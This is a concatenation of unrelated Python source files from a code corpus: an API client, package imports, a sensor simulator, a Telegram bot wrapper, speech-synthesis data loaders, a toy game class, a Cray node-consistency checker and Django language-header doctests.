        headers = {'Authorization': 'Token %s' % self.token}
        session = JSONServiceClient(url=api_url, headers=headers)
        self.session = session
        if session_http is None:
            # NOTE(review): a caller-supplied session_http is used as-is and
            # will not carry the auth header — confirm that is intended.
            session_http = HTTPServiceClient(url=api_url, headers=headers)
        self.session_http = session_http

    def get_permissions(self):
        """Return the authenticated user's details/permissions."""
        return self.session.get('/user/')

    def get_users(self):
        """List all users."""
        return self.session.get('/users/')

    def create_user(self, user):
        """Create a user from a dict payload."""
        return self.session.post('/users/', data=user)

    def get_user(self, user):
        """Fetch a single user by id."""
        return self.session.get('/users/%s/' % user)

    def update_user(self, user_id, user):
        """Replace a user's data (HTTP PUT)."""
        return self.session.put('/users/%s/' % user_id, data=user)

    def remove_user_from_team(self, user, team):
        """Remove *user* from *team*; True iff the API returned HTTP 204."""
        response = self.session_http.delete('/teams/%s/users/%s/' % (
            team, user,))
        return response.status_code == 204

    def add_user_to_team(self, user, team):
        """Add *user* to *team*; True iff the API returned HTTP 204."""
        response = self.session_http.put('/teams/%s/users/%s/' % (team, user,))
        return response.status_code == 204

    def delete_user(self, user_id):
        """Archive (soft-delete) a user; True iff the API returned HTTP 204."""
        response = self.session_http.delete('/users/%s/' % user_id)
        return response.status_code == 204

    def get_teams(self):
        """List all teams."""
        return self.session.get('/teams/')

    def create_team(self, org, team):
        """Create a team inside organization *org*."""
        return self.session.post('/organizations/%s/teams/' % org, data=team)

    def create_permission(self, team, permission):
        """Grant a permission to *team*."""
        return self.session.post('/teams/%s/permissions/' % team,
                                 data=permission)
| StarcoderdataPython |
143548 | <filename>solvebio/resource/__init__.py
from __future__ import absolute_import
from .apiresource import ListObject
from .user import User
from .dataset import Dataset
from .datasetfield import DatasetField
from .datasetimport import DatasetImport
from .datasetexport import DatasetExport
from .datasetcommit import DatasetCommit
from .datasetmigration import DatasetMigration
from .datasettemplate import DatasetTemplate
from .vault_sync_task import VaultSyncTask
from .object_copy_task import ObjectCopyTask
from .manifest import Manifest
from .object import Object
from .vault import Vault
from .task import Task
from .beacon import Beacon
from .beaconset import BeaconSet
from .application import Application
from .group import Group
from .savedquery import SavedQuery
# Maps API class-name strings to the local resource classes used when
# deserializing responses.  Note the deliberate aliases: 'ECSTask' maps to
# the generic Task class and 'list' to ListObject.
# NOTE(review): the name shadows the stdlib ``types`` module inside this
# package; kept as-is for backward compatibility.
types = {
    'Application': Application,
    'Beacon': Beacon,
    'BeaconSet': BeaconSet,
    'Dataset': Dataset,
    'DatasetImport': DatasetImport,
    'DatasetExport': DatasetExport,
    'DatasetCommit': DatasetCommit,
    'DatasetMigration': DatasetMigration,
    'DatasetTemplate': DatasetTemplate,
    'DatasetField': DatasetField,
    'Group': Group,
    'Manifest': Manifest,
    'Object': Object,
    'ObjectCopyTask': ObjectCopyTask,
    'ECSTask': Task,
    'VaultSyncTask': VaultSyncTask,
    'User': User,
    'Vault': Vault,
    'list': ListObject,
    'SavedQuery': SavedQuery,
}
| StarcoderdataPython |
3301090 | <filename>handlers/__init__.py
from common_handler import *
from main_handler import *
| StarcoderdataPython |
17260 | import OIL.color
import OIL.label
import OIL.parser
import OIL.tools
import OIL.errors | StarcoderdataPython |
1760319 | #!/usr/bin/env python3
import random
import time
# Initial readings: three sensors (15, 20, 25 degrees) in four locations.
values = [15, 20, 25] * 4
while True:
    # Random-walk each reading by up to ±0.5 degrees per tick.
    values = list(map(lambda x: x + random.uniform(-0.5, 0.5), values))
    for value in values:
        # Emit "NN,NN;" per value — decimal comma for locale-style CSV output.
        print('{:0.2f}'.format(value).replace('.', ',') + ';', end='')
    print(flush=True)  # terminate the record and force it out immediately
    time.sleep(5)
| StarcoderdataPython |
3264256 | import os
from pysaurus.application import exceptions
from pysaurus.core.components import AbsolutePath
from pysaurus.core.functions import package_dir
from pysaurus.core.modules import System
# Locate the platform-specific native binaries shipped with the package and
# extend the process environment so the executables and their shared
# libraries can be found at runtime.  Any failure (missing directory or
# file) is surfaced as a single CysaurusUnavailable error.
try:
    BIN_PATH = AbsolutePath.join(
        package_dir(), "bin", System.get_identifier()
    ).assert_dir()
    # Shared library used by the video tools.
    ALIGNMENT_RAPTOR = AbsolutePath.join(
        BIN_PATH, System.get_lib_basename("alignmentRaptor", prefix="")
    ).assert_file()
    # Executables for batch video processing and thumbnail generation.
    RUN_VIDEO_RAPTOR_BATCH = AbsolutePath.join(
        BIN_PATH, System.get_exe_basename("runVideoRaptorBatch")
    ).assert_file()
    RUN_VIDEO_RAPTOR_THUMBNAILS = AbsolutePath.join(
        BIN_PATH, System.get_exe_basename("runVideoRaptorThumbnails")
    ).assert_file()
    # Append BIN_PATH to the search paths (import-time side effect for the
    # whole process).
    __prev_path = os.environ["PATH"]
    __prev_library_path = os.environ.get("LIBRARY_PATH", "")
    __prev_ld_library_path = os.environ.get("LD_LIBRARY_PATH", "")
    os.environ["PATH"] = f"{__prev_path}{os.pathsep}{BIN_PATH}"
    os.environ["LIBRARY_PATH"] = f"{__prev_library_path}{os.pathsep}{BIN_PATH}"
    os.environ["LD_LIBRARY_PATH"] = f"{__prev_ld_library_path}{os.pathsep}{BIN_PATH}"
except Exception as exc:
    raise exceptions.CysaurusUnavailable() from exc
| StarcoderdataPython |
1691134 | <reponame>sNoDliD/SecondTerm<gh_stars>0
import requests
import datetime
from functools import wraps
from .my_config import TOKEN
def debug(func):
    """Decorator that logs every call's arguments and return value."""
    @wraps(func)
    def wrapper_debug(*args, **kwargs):
        shown = [repr(arg) for arg in args]
        shown += [f"{key}={val!r}" for key, val in kwargs.items()]
        signature = ", ".join(shown)
        print(f"Вызываем {func.__name__}({signature})")
        result = func(*args, **kwargs)
        print(f"{func.__name__!r} возвращает {result!r}")
        return result
    return wrapper_debug
def timer(func):
    """Decorator that prints the wall-clock running time of each call.

    Bug fix: the original printed the elapsed time in *seconds* while the
    message labelled the number "мс" (milliseconds); the value is now
    converted to milliseconds to match the label.
    """
    @wraps(func)
    def wrapper_timer(*args, **kwargs):
        start = datetime.datetime.today()
        value = func(*args, **kwargs)
        elapsed_ms = (datetime.datetime.today() - start).total_seconds() * 1000
        print(f"Функция {func.__name__!r} выполнена за {elapsed_ms:.4f} мс")
        return value
    return wrapper_timer
def _check_result(result):
if result.status_code != 200:
msg = 'The server returned HTTP {0} {1}. Response body:\n[{2}]' \
.format(result.status_code, result.reason, result.text.encode('utf8'))
raise Exception(msg)
try:
result_json = result.json()
except:
msg = 'The server returned an invalid JSON response. Response body:\n[{0}]'.format(result.text.encode('utf8'))
raise Exception(msg)
if not result_json['ok']:
msg = 'Error code: {0} Description: {1}' \
.format(result_json['error_code'], result_json['description'])
raise Exception(msg)
return result_json
class Bot:
    """Thin singleton wrapper around the Telegram Bot HTTP API.

    Every ``Bot()`` call returns the same instance, which shares one lazily
    created ``requests`` session.
    """
    __instance = None

    def __new__(cls):
        # Create the single shared instance on first use.
        if not Bot.__instance:
            print('create new instance of bot')
            instance = object.__new__(cls)
            instance.bot_url = f'https://api.telegram.org/bot{TOKEN}/'
            instance._session = None  # HTTP session is created on first request
            Bot.__instance = instance
        return Bot.__instance

    @timer
    def send_message(self, user, text, markup=None, clear_markup=True):
        """Send *text* to *user*, optionally attaching an inline keyboard.

        With ``clear_markup`` the keyboard of the user's previous message is
        removed first, so only one message carries buttons at a time.
        """
        data = {'chat_id': user.id, 'text': text, 'parse_mode': 'HTML'}
        if markup:
            data['reply_markup'] = markup.dumps()
        if clear_markup and user.last_markup:
            self.edit_markup(user, user.last_markup)
        message = self.__do_request('sendMessage', data)
        if clear_markup and markup:
            user.last_markup = message['message_id']
        return message

    def edit_message(self, user, message_id, text, markup=None):
        """Edit an existing message, or send a new one when no id is given."""
        if not message_id:
            return self.send_message(user, text, markup)
        data = {'chat_id': user.id, 'text': text, 'message_id': message_id,
                'reply_markup': markup.dumps() if markup else None}
        message = self.__do_request('editMessageText', data)
        if markup:
            # Keep at most one message with an active keyboard.
            if user.last_markup and user.last_markup != message_id:
                self.edit_markup(user, user.last_markup)
            user.last_markup = message['message_id']
        elif user.last_markup == message_id:
            user.last_markup = None
        return message

    def delete_message(self, chat_id, message_id, replace=None):
        """Delete a message; if deletion fails, overwrite its text instead."""
        data = {'chat_id': chat_id, 'message_id': message_id}
        try:
            return self.__do_request('deleteMessage', data)
        except Exception:  # bug fix: was a bare ``except:``
            data['text'] = replace or 'Отменено'
            try:
                return self.__do_request('editMessageText', data)
            except Exception:  # bug fix: was a bare ``except:``
                # NOTE(review): returning the Exception *class* looks like a
                # leftover; callers appear to only truth-test the result.
                return Exception

    @timer
    def answer_callback_query(self, query_id, text, alert=False):
        """Acknowledge a callback query with a toast (or alert) message."""
        data = {'callback_query_id': query_id, 'text': text, 'show_alert': alert}
        return self.__do_request('answerCallbackQuery', data)

    def get_updates(self, offset, limit=1):
        """Long-poll for updates starting at *offset*."""
        data = {'limit': limit, 'offset': offset}
        return self.__do_request('getUpdates', data)

    def leave_chat(self, chat_id):
        """Make the bot leave the given chat."""
        data = {'chat_id': chat_id}
        return self.__do_request('leaveChat', data)

    def get_chat(self, chat_id):
        """Fetch chat metadata."""
        data = {'chat_id': chat_id}
        return self.__do_request('getChat', data)

    def edit_markup(self, user, message_id, markup=None):
        """Replace (or remove, when *markup* is None) a message's keyboard."""
        data = {'chat_id': user.id, 'message_id': message_id}
        if markup:
            data['reply_markup'] = markup.dumps()
        user.last_markup = None
        return self.__do_request('editMessageReplyMarkup', data)

    def __do_request(self, method_name, param, method='post'):
        # The session is created lazily so constructing the Bot does not open
        # network resources.
        if not self._session:
            self._session = requests.session()
        return _check_result(self._session.request(method, self.bot_url + method_name, param))['result']
| StarcoderdataPython |
137483 | <filename>python/data_utils.py
import time
import os
import random
import numpy as np
import torch
import torch.utils.data
import commons
from mel_processing import spectrogram_torch
from utils import load_wav_to_torch, load_filepaths_and_text
from text import text_to_sequence, cleaned_text_to_sequence
#add
from retry import retry
class TextAudioLoader(torch.utils.data.Dataset):
    """Single-speaker dataset of (text, spectrogram, waveform) triples.

    1) loads audio, text pairs
    2) normalizes text and converts them to sequences of integers
    3) computes (and caches) spectrograms from audio files.
    """
    def __init__(self, audiopaths_and_text, hparams, use_test=True):
        self.audiopaths_and_text = load_filepaths_and_text(audiopaths_and_text)
        self.text_cleaners = hparams.text_cleaners
        self.max_wav_value = hparams.max_wav_value
        self.sampling_rate = hparams.sampling_rate
        self.filter_length = hparams.filter_length
        self.hop_length = hparams.hop_length
        self.win_length = hparams.win_length
        # When False, every sample's transcript is replaced by a dummy "a".
        self.use_test = use_test
        self.cleaned_text = getattr(hparams, "cleaned_text", False)
        self.add_blank = hparams.add_blank
        self.min_text_len = getattr(hparams, "min_text_len", 1)
        self.max_text_len = getattr(hparams, "max_text_len", 190)
        # Fixed seed so every process shuffles the file list identically.
        random.seed(1234)
        random.shuffle(self.audiopaths_and_text)
        self._filter()

    def _filter(self):
        """Filter out-of-range transcripts & store spec lengths for bucketing.

        wav_length ~= file_size / (wav_channels * Bytes per dim) = file_size / (1 * 2)
        spec_length = wav_length // hop_length
        """
        audiopaths_and_text_new = []
        lengths = []
        for audiopath, text in self.audiopaths_and_text:
            if self.min_text_len <= len(text) <= self.max_text_len:
                audiopaths_and_text_new.append([audiopath, text])
                lengths.append(os.path.getsize(audiopath) // (2 * self.hop_length))
        self.audiopaths_and_text = audiopaths_and_text_new
        self.lengths = lengths

    def get_audio_text_pair(self, audiopath_and_text):
        """Return (text_ids, spectrogram, waveform) for one manifest entry."""
        # separate filename and text
        audiopath, text = audiopath_and_text[0], audiopath_and_text[1]
        text = self.get_text(text)
        if not self.use_test:
            # Bug fix: the original used torch.as_tensor("a"), which raises a
            # TypeError; encode a dummy transcript instead, mirroring
            # TextAudioSpeakerLoader.
            text = self.get_text("a")
        spec, wav = self.get_audio(audiopath)
        return (text, spec, wav)

    def get_audio(self, filename):
        """Load a wav, normalise it, and return (spectrogram, waveform).

        The spectrogram is cached next to the wav as ``*.spec.pt``.
        """
        audio, sampling_rate = load_wav_to_torch(filename)
        if sampling_rate != self.sampling_rate:
            # Bug fix: the original format string had three placeholders but
            # only two arguments, so raising it crashed with an IndexError.
            raise ValueError("{} {} SR doesn't match target {} SR".format(
                filename, sampling_rate, self.sampling_rate))
        audio_norm = audio / self.max_wav_value
        audio_norm = audio_norm.unsqueeze(0)
        spec_filename = filename.replace(".wav", ".spec.pt")
        if os.path.exists(spec_filename):
            spec = torch.load(spec_filename)
        else:
            spec = spectrogram_torch(audio_norm, self.filter_length,
                self.sampling_rate, self.hop_length, self.win_length,
                center=False)
            spec = torch.squeeze(spec, 0)
            torch.save(spec, spec_filename)
        return spec, audio_norm

    def get_text(self, text):
        """Convert a transcript string to a LongTensor of symbol ids."""
        if self.cleaned_text:
            text_norm = cleaned_text_to_sequence(text)
        else:
            text_norm = text_to_sequence(text, self.text_cleaners)
        if self.add_blank:
            # Interleave blank tokens (id 0) between symbols.
            text_norm = commons.intersperse(text_norm, 0)
        text_norm = torch.LongTensor(text_norm)
        return text_norm

    def __getitem__(self, index):
        return self.get_audio_text_pair(self.audiopaths_and_text[index])

    def __len__(self):
        return len(self.audiopaths_and_text)
class TextAudioCollate():
    """Zero-pads a batch of (text, spec, wav) tuples to common lengths."""

    def __init__(self, return_ids=False):
        # When True, also return the permutation used to sort the batch.
        self.return_ids = return_ids

    def __call__(self, batch):
        """Collate a training batch of [text_normalized, spec_normalized, wav_normalized].

        Rows come back sorted by decreasing spectrogram length, right-padded
        with zeros up to the longest entry.
        """
        spec_sizes = torch.LongTensor([item[1].size(1) for item in batch])
        _, order = torch.sort(spec_sizes, dim=0, descending=True)

        longest_text = max(len(item[0]) for item in batch)
        longest_spec = max(item[1].size(1) for item in batch)
        longest_wav = max(item[2].size(1) for item in batch)

        n = len(batch)
        text_lengths = torch.LongTensor(n)
        spec_lengths = torch.LongTensor(n)
        wav_lengths = torch.LongTensor(n)

        text_padded = torch.LongTensor(n, longest_text).zero_()
        spec_padded = torch.FloatTensor(n, batch[0][1].size(0), longest_spec).zero_()
        wav_padded = torch.FloatTensor(n, 1, longest_wav).zero_()

        for dst, src in enumerate(order):
            text, spec, wav = batch[src]
            text_padded[dst, :text.size(0)] = text
            text_lengths[dst] = text.size(0)
            spec_padded[dst, :, :spec.size(1)] = spec
            spec_lengths[dst] = spec.size(1)
            wav_padded[dst, :, :wav.size(1)] = wav
            wav_lengths[dst] = wav.size(1)

        if self.return_ids:
            return text_padded, text_lengths, spec_padded, spec_lengths, wav_padded, wav_lengths, order
        return text_padded, text_lengths, spec_padded, spec_lengths, wav_padded, wav_lengths
"""Multi speaker version"""
class TextAudioSpeakerLoader(torch.utils.data.Dataset):
    """Multi-speaker dataset of (text, spectrogram, waveform, speaker-id).

    1) loads audio, speaker_id, text pairs
    2) normalizes text and converts them to sequences of integers
    3) computes (and caches) spectrograms from audio files.
    """
    def __init__(self, audiopaths_sid_text, hparams, no_text=False):
        self.audiopaths_sid_text = load_filepaths_and_text(audiopaths_sid_text)
        self.text_cleaners = hparams.text_cleaners
        self.max_wav_value = hparams.max_wav_value
        self.sampling_rate = hparams.sampling_rate
        self.filter_length = hparams.filter_length
        self.hop_length = hparams.hop_length
        self.win_length = hparams.win_length
        # When True, every transcript is replaced by a dummy "a".
        self.no_text = no_text
        self.cleaned_text = getattr(hparams, "cleaned_text", False)
        self.add_blank = hparams.add_blank
        self.min_text_len = getattr(hparams, "min_text_len", 1)
        self.max_text_len = getattr(hparams, "max_text_len", 190)
        # Fixed seed so every process shuffles the file list identically.
        random.seed(1234)
        random.shuffle(self.audiopaths_sid_text)
        self._filter()

    # Bug fix: ``exceptions=(IOError)`` is just IOError, not a tuple — the
    # missing comma is added for clarity (retry on transient file errors).
    @retry(exceptions=(IOError,), tries=10, delay=1)
    def _filter(self):
        """Filter out-of-range transcripts & store spec lengths for bucketing.

        wav_length ~= file_size / (wav_channels * Bytes per dim) = file_size / (1 * 2)
        spec_length = wav_length // hop_length
        """
        audiopaths_sid_text_new = []
        lengths = []
        for audiopath, sid, text in self.audiopaths_sid_text:
            if self.min_text_len <= len(text) <= self.max_text_len:
                audiopaths_sid_text_new.append([audiopath, sid, text])
                lengths.append(os.path.getsize(audiopath) // (2 * self.hop_length))
        self.audiopaths_sid_text = audiopaths_sid_text_new
        self.lengths = lengths

    def get_audio_text_speaker_pair(self, audiopath_sid_text):
        """Return (text_ids, spectrogram, waveform, sid) for one entry."""
        # separate filename, speaker_id and text
        audiopath, sid, text = audiopath_sid_text[0], audiopath_sid_text[1], audiopath_sid_text[2]
        text = self.get_text(text)
        if self.no_text:
            text = self.get_text("a")
        spec, wav = self.get_audio(audiopath)
        sid = self.get_sid(sid)
        return (text, spec, wav, sid)

    def get_audio(self, filename):
        """Load a wav, normalise it, and return (spectrogram, waveform).

        Spectrograms are written to a "spec/" sibling directory.  The two
        branches of the original if/else both recomputed and re-saved the
        spectrogram, so the duplicated code is collapsed into one path
        (behavior unchanged: the spectrogram is always recomputed).
        """
        audio, sampling_rate = load_wav_to_torch(filename)
        if sampling_rate != self.sampling_rate:
            # Bug fix: the original format string had three placeholders but
            # only two arguments, so raising it crashed with an IndexError.
            raise ValueError("{} {} SR doesn't match target {} SR".format(
                filename, sampling_rate, self.sampling_rate))
        audio_norm = audio / self.max_wav_value
        audio_norm = audio_norm.unsqueeze(0)
        spec_filename = filename.replace(".wav", ".spec.pt")
        spec_dir = os.path.dirname(spec_filename) + "/spec"
        spec_file_path = spec_dir + "/" + os.path.basename(spec_filename)
        if not os.path.isdir(spec_dir):
            # NOTE(review): os.mkdir can race when multiple workers create
            # the directory simultaneously — confirm single-writer setup.
            os.mkdir(spec_dir)
        spec = spectrogram_torch(audio_norm, self.filter_length,
            self.sampling_rate, self.hop_length, self.win_length,
            center=False)
        spec = torch.squeeze(spec, 0)
        torch.save(spec, spec_file_path)
        return spec, audio_norm

    def get_text(self, text):
        """Convert a transcript string to a LongTensor of symbol ids."""
        if self.cleaned_text:
            text_norm = cleaned_text_to_sequence(text)
        else:
            text_norm = text_to_sequence(text, self.text_cleaners)
        if self.add_blank:
            # Interleave blank tokens (id 0) between symbols.
            text_norm = commons.intersperse(text_norm, 0)
        text_norm = torch.LongTensor(text_norm)
        return text_norm

    def get_sid(self, sid):
        """Wrap a speaker id string/int in a 1-element LongTensor."""
        sid = torch.LongTensor([int(sid)])
        return sid

    def __getitem__(self, index):
        return self.get_audio_text_speaker_pair(self.audiopaths_sid_text[index])

    def __len__(self):
        return len(self.audiopaths_sid_text)
class TextAudioSpeakerCollate():
    """Zero-pads a batch of (text, spec, wav, sid) tuples to common lengths."""

    def __init__(self, return_ids=False, no_text=False):
        # return_ids: also return the sorting permutation.
        # no_text: kept for interface compatibility; not used when collating.
        self.return_ids = return_ids
        self.no_text = no_text

    def __call__(self, batch):
        """Collate [text_normalized, spec_normalized, wav_normalized, sid] rows.

        Rows come back sorted by decreasing spectrogram length, right-padded
        with zeros up to the longest entry.
        """
        spec_sizes = torch.LongTensor([row[1].size(1) for row in batch])
        _, order = torch.sort(spec_sizes, dim=0, descending=True)

        longest_text = max(len(row[0]) for row in batch)
        longest_spec = max(row[1].size(1) for row in batch)
        longest_wav = max(row[2].size(1) for row in batch)

        n = len(batch)
        text_lengths = torch.LongTensor(n)
        spec_lengths = torch.LongTensor(n)
        wav_lengths = torch.LongTensor(n)
        sid = torch.LongTensor(n)

        text_padded = torch.LongTensor(n, longest_text).zero_()
        spec_padded = torch.FloatTensor(n, batch[0][1].size(0), longest_spec).zero_()
        wav_padded = torch.FloatTensor(n, 1, longest_wav).zero_()

        for dst, src in enumerate(order):
            text, spec, wav, speaker = batch[src]
            text_padded[dst, :text.size(0)] = text
            text_lengths[dst] = text.size(0)
            spec_padded[dst, :, :spec.size(1)] = spec
            spec_lengths[dst] = spec.size(1)
            wav_padded[dst, :, :wav.size(1)] = wav
            wav_lengths[dst] = wav.size(1)
            sid[dst] = speaker

        if self.return_ids:
            return text_padded, text_lengths, spec_padded, spec_lengths, wav_padded, wav_lengths, sid, order
        return text_padded, text_lengths, spec_padded, spec_lengths, wav_padded, wav_lengths, sid
class DistributedBucketSampler(torch.utils.data.distributed.DistributedSampler):
"""
Maintain similar input lengths in a batch.
Length groups are specified by boundaries.
Ex) boundaries = [b1, b2, b3] -> any batch is included either {x | b1 < length(x) <=b2} or {x | b2 < length(x) <= b3}.
It removes samples which are not included in the boundaries.
Ex) boundaries = [b1, b2, b3] -> any x s.t. length(x) <= b1 or length(x) > b3 are discarded.
"""
def __init__(self, dataset, batch_size, boundaries, num_replicas=None, rank=None, shuffle=True):
super().__init__(dataset, num_replicas=num_replicas, rank=rank, shuffle=shuffle)
self.lengths = dataset.lengths
self.batch_size = batch_size
self.boundaries = boundaries
self.buckets, self.num_samples_per_bucket = self._create_buckets()
self.total_size = sum(self.num_samples_per_bucket)
self.num_samples = self.total_size // self.num_replicas
def _create_buckets(self):
buckets = [[] for _ in range(len(self.boundaries) - 1)]
for i in range(len(self.lengths)):
length = self.lengths[i]
idx_bucket = self._bisect(length)
if idx_bucket != -1:
buckets[idx_bucket].append(i)
for i in range(len(buckets) - 1, 0, -1):
if len(buckets[i]) == 0:
buckets.pop(i)
self.boundaries.pop(i+1)
num_samples_per_bucket = []
for i in range(len(buckets)):
len_bucket = len(buckets[i])
total_batch_size = self.num_replicas * self.batch_size
rem = (total_batch_size - (len_bucket % total_batch_size)) % total_batch_size
num_samples_per_bucket.append(len_bucket + rem)
return buckets, num_samples_per_bucket
def __iter__(self):
# deterministically shuffle based on epoch
g = torch.Generator()
g.manual_seed(self.epoch)
indices = []
if self.shuffle:
for bucket in self.buckets:
indices.append(torch.randperm(len(bucket), generator=g).tolist())
else:
for bucket in self.buckets:
indices.append(list(range(len(bucket))))
batches = []
for i in range(len(self.buckets)):
bucket = self.buckets[i]
len_bucket = len(bucket)
ids_bucket = indices[i]
num_samples_bucket = self.num_samples_per_bucket[i]
# add extra samples to make it evenly divisible
rem = num_samples_bucket - len_bucket
ids_bucket = ids_bucket + ids_bucket * (rem // len_bucket) + ids_bucket[:(rem % len_bucket)]
# subsample
ids_bucket = ids_bucket[self.rank::self.num_replicas]
# batching
for j in range(len(ids_bucket) // self.batch_size):
batch = [bucket[idx] for idx in ids_bucket[j*self.batch_size:(j+1)*self.batch_size]]
batches.append(batch)
if self.shuffle:
batch_ids = torch.randperm(len(batches), generator=g).tolist()
batches = [batches[i] for i in batch_ids]
self.batches = batches
assert len(self.batches) * self.batch_size == self.num_samples
return iter(self.batches)
def _bisect(self, x, lo=0, hi=None):
if hi is None:
hi = len(self.boundaries) - 1
if hi > lo:
mid = (hi + lo) // 2
if self.boundaries[mid] < x and x <= self.boundaries[mid+1]:
return mid
elif x <= self.boundaries[mid]:
return self._bisect(x, lo, mid)
else:
return self._bisect(x, mid + 1, hi)
else:
return -1
    def __len__(self):
        """Number of batches this replica yields per epoch."""
        return self.num_samples // self.batch_size
| StarcoderdataPython |
3202727 |
class Games():
    """Abstract two-player game with round and score bookkeeping."""

    # Class-wide "fun" rating shared by every game instance.
    fun_level = 5

    def __init__(self, player1='Alice', player2='Bob'):
        self.rounds = 2
        self.current_round = 0
        self.player1 = player1
        self.player2 = player2
        self.player1_score = 0
        self.player2_score = 0

    def print_player(self):
        """Announce who is playing whom."""
        print(f"{self.player1} is playing {self.player2}")

    def add_round(self):
        """Advance the round counter by one."""
        self.current_round = self.current_round + 1

    def player1_score_add(self):
        """Award one point to player 1."""
        self.player1_score = self.player1_score + 1

    def player2_score_add(self):
        """Award one point to player 2."""
        self.player2_score = self.player2_score + 1

    def report_score(self):
        """Print the current score line for both players."""
        print(f"{self.player1} has {self.player1_score} points and "
              f" {self.player2} has  {self.player2_score} points")
class TicTacToe(Games):
    """TicTacToe specialisation of Games: player 1 plays X, player 2 plays O."""

    def __init__(self, player1='Will', player2='Mac'):
        super().__init__(player1, player2)
        self.x = self.player1
        self.o = self.player2

    def x_and_o(self):
        """Announce which player is on which team."""
        print(f"{self.x} is team X and {self.o} is team O")
if __name__ == "__main__":
    # Demo: instantiate an instance of Games() and a TicTacToe() game.
    # (The original had a no-op guard followed by unconditional top-level
    # code, so the demo also ran on import; it now runs only as a script.)
    game = Games()
    print(game.rounds)
    ttt = TicTacToe()
    # Call the method -- the original did print(ttt.x_and_o), which printed
    # the bound-method object instead of the team announcement.
    ttt.x_and_o()
3368502 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
-------------------------------------------------------------------------------
@Name: adder3.py
@Desc:
@Author: <EMAIL>
@Create: 2020.05.13 9:38
-------------------------------------------------------------------------------
@Change: 2020.05.13
-------------------------------------------------------------------------------
"""
import sys
# Sum one integer per line from standard input and print the total.
# The accumulator is named `total` -- the original shadowed the builtin `sum`.
total = 0
for line in sys.stdin:
    total += int(line)
print(total)
| StarcoderdataPython |
1659061 | <gh_stars>0
#!/usr/bin/env python3
import json
import subprocess
import sys
def _fetch_json(cmd):
    """Run *cmd* (argv list) and decode its stdout as JSON."""
    raw_result = subprocess.run(cmd, stdout=subprocess.PIPE)
    return json.loads(raw_result.stdout.decode("utf-8"))


def main():
    """Compare UAN nodes known to HSM and SLS and exit accordingly.

    Exits 0 when the Hardware State Manager (HSM) and the System Layout
    Service (SLS) agree on the set of UAN nodes, 1 otherwise (printing the
    nodes present on one side only).
    """
    # Get UAN nodes from HSM (already filtered by role/subrole server-side).
    hsm_result = _fetch_json(
        "cray hsm state components list --role Application --subrole UAN --format json".split())
    hsm_discovered_uans = {node["ID"] for node in hsm_result["Components"]}

    # Get UAN nodes that SLS knows about (filter client-side on SubRole).
    sls_result = _fetch_json("cray sls hardware list --format json".split())
    sls_known_uans = {node["Xname"] for node in sls_result
                      if "ExtraProperties" in node
                      if "SubRole" in node["ExtraProperties"]
                      if node["ExtraProperties"]["SubRole"] == "UAN"}

    if hsm_discovered_uans != sls_known_uans:
        in_hsm_not_sls = hsm_discovered_uans - sls_known_uans
        in_sls_not_hsm = sls_known_uans - hsm_discovered_uans
        if in_hsm_not_sls:
            print("ERROR: The Hardware State Manager (HSM) contains UAN nodes that System Layout Service (SLS) does not.")
            print("Nodes: ", in_hsm_not_sls)
        if in_sls_not_hsm:
            print("ERROR: System Layout Service (SLS) contains UAN nodes the Hardware State Manager (HSM) does not.")
            print("Nodes: ", in_sls_not_hsm)
        sys.exit(1)
    else:
        print("PASS: System Layout Service (SLS) and Hardware State Manager (HSM) contain the same UAN nodes.")
        print("Nodes: ", sls_known_uans)
        sys.exit(0)


if __name__ == "__main__":
    main()
| StarcoderdataPython |
1736449 | import sys
tests = """
>>> from django.utils.translation.trans_real import parse_accept_lang_header
>>> p = parse_accept_lang_header
#
# Testing HTTP header parsing. First, we test that we can parse the values
# according to the spec (and that we extract all the pieces in the right order).
#
Good headers.
>>> p('de')
[('de', 1.0)]
>>> p('en-AU')
[('en-AU', 1.0)]
>>> p('*;q=1.00')
[('*', 1.0)]
>>> p('en-AU;q=0.123')
[('en-AU', 0.123)]
>>> p('en-au;q=0.5')
[('en-au', 0.5)]
>>> p('en-au;q=1.0')
[('en-au', 1.0)]
>>> p('da, en-gb;q=0.25, en;q=0.5')
[('da', 1.0), ('en', 0.5), ('en-gb', 0.25)]
>>> p('en-au-xx')
[('en-au-xx', 1.0)]
>>> p('de,en-au;q=0.75,en-us;q=0.5,en;q=0.25,es;q=0.125,fa;q=0.125')
[('de', 1.0), ('en-au', 0.75), ('en-us', 0.5), ('en', 0.25), ('es', 0.125), ('fa', 0.125)]
>>> p('*')
[('*', 1.0)]
>>> p('de;q=0.')
[('de', 1.0)]
>>> p('')
[]
Bad headers; should always return [].
>>> p('en-gb;q=1.0000')
[]
>>> p('en;q=0.1234')
[]
>>> p('en;q=.2')
[]
>>> p('abcdefghi-au')
[]
>>> p('**')
[]
>>> p('en,,gb')
[]
>>> p('en-au;q=0.1.0')
[]
>>> p('XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXZ,en')
[]
>>> p('da, en-gb;q=0.8, en;q=0.7,#')
[]
>>> p('de;q=2.0')
[]
>>> p('de;q=0.a')
[]
>>> p('')
[]
#
# Now test that we parse a literal HTTP header correctly.
#
>>> from django.utils.translation.trans_real import get_language_from_request
>>> g = get_language_from_request
>>> from django.http import HttpRequest
>>> r = HttpRequest
>>> r.COOKIES = {}
These tests assumes the es, es_AR, pt and pt_BR translations exit in the Django
source tree.
>>> r.META = {'HTTP_ACCEPT_LANGUAGE': 'pt-br'}
>>> g(r)
'pt-br'
>>> r.META = {'HTTP_ACCEPT_LANGUAGE': 'pt'}
>>> g(r)
'pt'
>>> r.META = {'HTTP_ACCEPT_LANGUAGE': 'es,de'}
>>> g(r)
'es'
>>> r.META = {'HTTP_ACCEPT_LANGUAGE': 'es-ar,de'}
>>> g(r)
'es-ar'
# Now test that we parse language preferences stored in a cookie correctly.
>>> from django.conf import settings
>>> r.COOKIES = {settings.LANGUAGE_COOKIE_NAME: 'pt-br'}
>>> r.META = {}
>>> g(r)
'pt-br'
>>> r.COOKIES = {settings.LANGUAGE_COOKIE_NAME: 'pt'}
>>> r.META = {}
>>> g(r)
'pt'
>>> r.COOKIES = {settings.LANGUAGE_COOKIE_NAME: 'es'}
>>> r.META = {'HTTP_ACCEPT_LANGUAGE': 'de'}
>>> g(r)
'es'
"""
# Python 2.3 and 2.4 return slightly different results for completely bogus
# locales, so we omit this test for that anything below 2.4. It's relatively
# harmless in any cases (GIGO). This also means this won't be executed on
# Jython currently, but life's like that sometimes. (On those platforms,
# passing in a truly bogus locale will get you the default locale back.)
